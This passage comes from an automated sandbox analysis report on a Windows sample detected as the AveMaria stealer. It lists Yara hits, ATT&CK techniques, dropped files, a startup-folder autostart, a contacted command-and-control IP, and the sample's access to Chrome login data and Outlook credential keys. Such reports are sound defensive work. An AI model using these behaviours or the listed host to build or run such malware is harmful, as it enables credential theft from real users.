          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00408024 cpuid
          Source: C:\ProgramData\images.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_0040826B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\ProgramData\images.exeCode function: 4_3_02F494E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Increases the number of concurrent connection per server for Internet Explorer
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected AveMaria stealer
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.272602277.0000000000720000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\ProgramData\images.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\ProgramData\images.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Contains functionality to steal e-mail passwords
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: POP3 Password
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: SMTP Password
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: IMAP Password
          Contains functionality to steal Chrome passwords or cookies
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: \Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: \Chromium\User Data\Default\Login Data
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe PID: 6324, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: images.exe PID: 6516, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected AveMaria stealer
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.272602277.0000000000720000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\ProgramData\images.exeCode function: 4_3_02F652D0 sqlite3_transfer_bindings,

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts21
          Windows Management Instrumentation          		1
          LSASS Driver          		1
          LSASS Driver          		11
          Disable or Modify Tools          		3
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium21
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          Endpoint Denial of Service
          Default Accounts11
          Scripting          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		121
          Input Capture          		1
          Account Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth2
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts12
          Native API          		1
          Create Account          		1
          Access Token Manipulation          		11
          Scripting          		1
          Credentials In Files          		1
          System Service Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration1
          Non-Standard Port          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts2
          Service Execution          		21
          Windows Service          		21
          Windows Service          		21
          Obfuscated Files or Information          		NTDS4
          File and Directory Discovery          		Distributed Component Object Model121
          Input Capture          		Scheduled Transfer1
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCron2
          Registry Run Keys / Startup Folder          		422
          Process Injection          		11
          Software Packing          		LSA Secrets39
          System Information Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.common2
          Registry Run Keys / Startup Folder          		1
          DLL Side-Loading          		Cached Domain Credentials141
          Security Software Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items13
          Masquerading          		DCSync41
          Virtualization/Sandbox Evasion          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job41
          Virtualization/Sandbox Evasion          		Proc Filesystem3
          Process Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
          Access Token Manipulation          		/etc/passwd and /etc/shadow1
          Application Window Discovery          		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)422
          Process Injection          		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron2
          Hidden Users          		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
          Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
          NTFS File Attributes          		KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 631792 Sample: SecuriteInfo.com.Gen.Varian... Startdate: 22/05/2022 Architecture: WINDOWS Score: 100 51 Snort IDS alert for network traffic 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 11 other signatures 2->57 8 SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe 4 8 2->8         started        12 cmd.exe 1 2->12         started        14 tsusbhub.sys 3 2->14         started        16 4 other processes 2->16 process3 file4 41 C:\ProgramData\images.exe, PE32 8->41 dropped 43 C:\ProgramData:ApplicationData, PE32 8->43 dropped 45 C:\Users\user\AppData\...\programs.bat:start, ASCII 8->45 dropped 47 2 other malicious files 8->47 dropped 69 Creates files in alternative data streams (ADS) 8->69 71 Drops script or batch files to the startup folder 8->71 73 Contains functionality to inject threads in other processes 8->73 75 5 other signatures 8->75 18 images.exe 5 9 8->18         started        23 powershell.exe 22 8->23         started        25 WMIC.exe 1 12->25         started        27 conhost.exe 12->27         started        signatures5 process6 dnsIp7 49 23.227.202.157, 49740, 8080 HVC-ASUS United States 18->49 39 C:\Program Files\Microsoft DN1\sqlmap.dll, PE32+ 18->39 dropped 59 Multi AV Scanner detection for dropped file 18->59 61 Hides user accounts 18->61 63 Tries to steal Mail credentials (via file / registry access) 18->63 67 7 other signatures 18->67 29 cmd.exe 1 18->29         started        31 powershell.exe 18->31         started        33 conhost.exe 23->33         started        65 Creates processes via WMI 25->65 file8 signatures9 process10 process11 35 conhost.exe 29->35         started        37 conhost.exe 31->37         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe24%ReversingLabsWin32.Trojan.Streamer
          SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Program Files\Microsoft DN1\sqlmap.dll100%AviraPUA/Remoteadmin.AR
          C:\ProgramData:ApplicationData100%Joe Sandbox ML
          C:\ProgramData\images.exe100%Joe Sandbox ML
          C:\Program Files\Microsoft DN1\sqlmap.dll49%VirustotalBrowse
          C:\Program Files\Microsoft DN1\sqlmap.dll20%MetadefenderBrowse
          C:\Program Files\Microsoft DN1\sqlmap.dll50%ReversingLabsWin64.PUA.Presenoker
          C:\ProgramData:ApplicationData24%ReversingLabsWin32.Trojan.Streamer
          C:\ProgramData\images.exe24%ReversingLabsWin32.Trojan.Streamer

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.2d10000.3.unpack100%AviraTR/Redcap.ghjptDownload File
          0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.732e68.2.unpack100%AviraTR/Patched.Ren.Gen3Download File
          4.3.images.exe.732cb8.3.unpack100%AviraTR/Patched.Ren.Gen3Download File
          0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.231053f.2.unpack100%AviraTR/Patched.Ren.Gen3Download File
          4.0.images.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          4.0.images.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.732e68.6.unpack100%AviraTR/Patched.Ren.Gen3Download File
          0.0.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          4.0.images.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          4.3.images.exe.732cb8.7.unpack100%AviraTR/Patched.Ren.Gen3Download File
          4.2.images.exe.22e053f.3.unpack100%AviraTR/Patched.Ren.Gen3Download File
          4.2.images.exe.2ce0000.4.unpack100%AviraTR/Redcap.ghjptDownload File
          4.0.images.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          4.2.images.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.2.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://stascorp.comDVarFileInfo$0%Avira URL Cloudsafe
          http://www.microsoft.0%URL Reputationsafe
          http://crl.micro0%URL Reputationsafe
          http://crl.microsof0%URL Reputationsafe
          23.227.202.1572%VirustotalBrowse
          23.227.202.1570%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          23.227.202.157true
          • 2%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://support.google.com/chrome/?p=plugin_flashimages.exe, 00000004.00000002.525619079.0000000004AE0000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://stascorp.comDVarFileInfo$sqlmap.dll.4.drfalse
            • Avira URL Cloud: safe
            		low
            http://www.microsoft.powershell.exe, 00000001.00000003.342861149.0000000008D06000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://crl.micropowershell.exe, 00000006.00000003.407047557.00000000076DF000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://github.com/syohex/java-simple-mine-sweeperC:SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmpfalse
              		high
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.409620051.0000000004601000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.409298369.00000000044C1000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://crl.microsofpowershell.exe, 00000001.00000003.377239509.00000000075FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.384190535.00000000075FB000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://support.google.com/chrome/answer/6258784images.exe, 00000004.00000002.525619079.0000000004AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://github.com/syohex/java-simple-mine-sweeperSecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exefalse
                      		high
                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.409620051.0000000004601000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        23.227.202.157
                        		unknownUnited States
                        		29802HVC-ASUStrue

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:631792
                        Start date and time: 22/05/202212:32:062022-05-22 12:32:06 +02:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 10m 9s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.7507 (renamed file extension from 7507 to exe)
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:40
                        Number of new started drivers analysed:3
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.phis.troj.spyw.expl.evad.winEXE@18/18@0/1
                        EGA Information:
                        • Successful, ratio: 66.7%
                        HDC Information:
                        • Successful, ratio: 44.8% (good quality ratio 44.4%)
                        • Quality average: 86.8%
                        • Quality standard deviation: 21.1%
                        HCA Information:
                        • Successful, ratio: 94%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                        • Execution Graph export aborted for target images.exe, PID 6516 because there are no executed function
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        12:33:15AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat
                        12:33:27API Interceptor1x Sleep call for process: WMIC.exe modified
                        12:33:28API Interceptor854x Sleep call for process: cmd.exe modified
                        12:33:44API Interceptor50x Sleep call for process: powershell.exe modified

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASNs

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Program Files\Microsoft DN1\rdpwrap.ini

                        Download File
                        Process:C:\ProgramData\images.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):253693
                        Entropy (8bit):5.4435816594509685
                        Encrypted:false
                        SSDEEP:768:NUiQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb5x8Rr/d6gl/+f8jZ0ftlFi4x7Qc:WJ33L+MoIiG4IvREWddadl/FY
                        MD5:4997128EF0ECA4C4696BF4177FF3AFF5
                        SHA1:7DD50F7BE34F25D580378A84B8F11A08F7EE8D1F
                        SHA-256:C59A7CF7B08FA7F79C51CA9126300B32FCEECE6972A9E8837D384804FD613E24
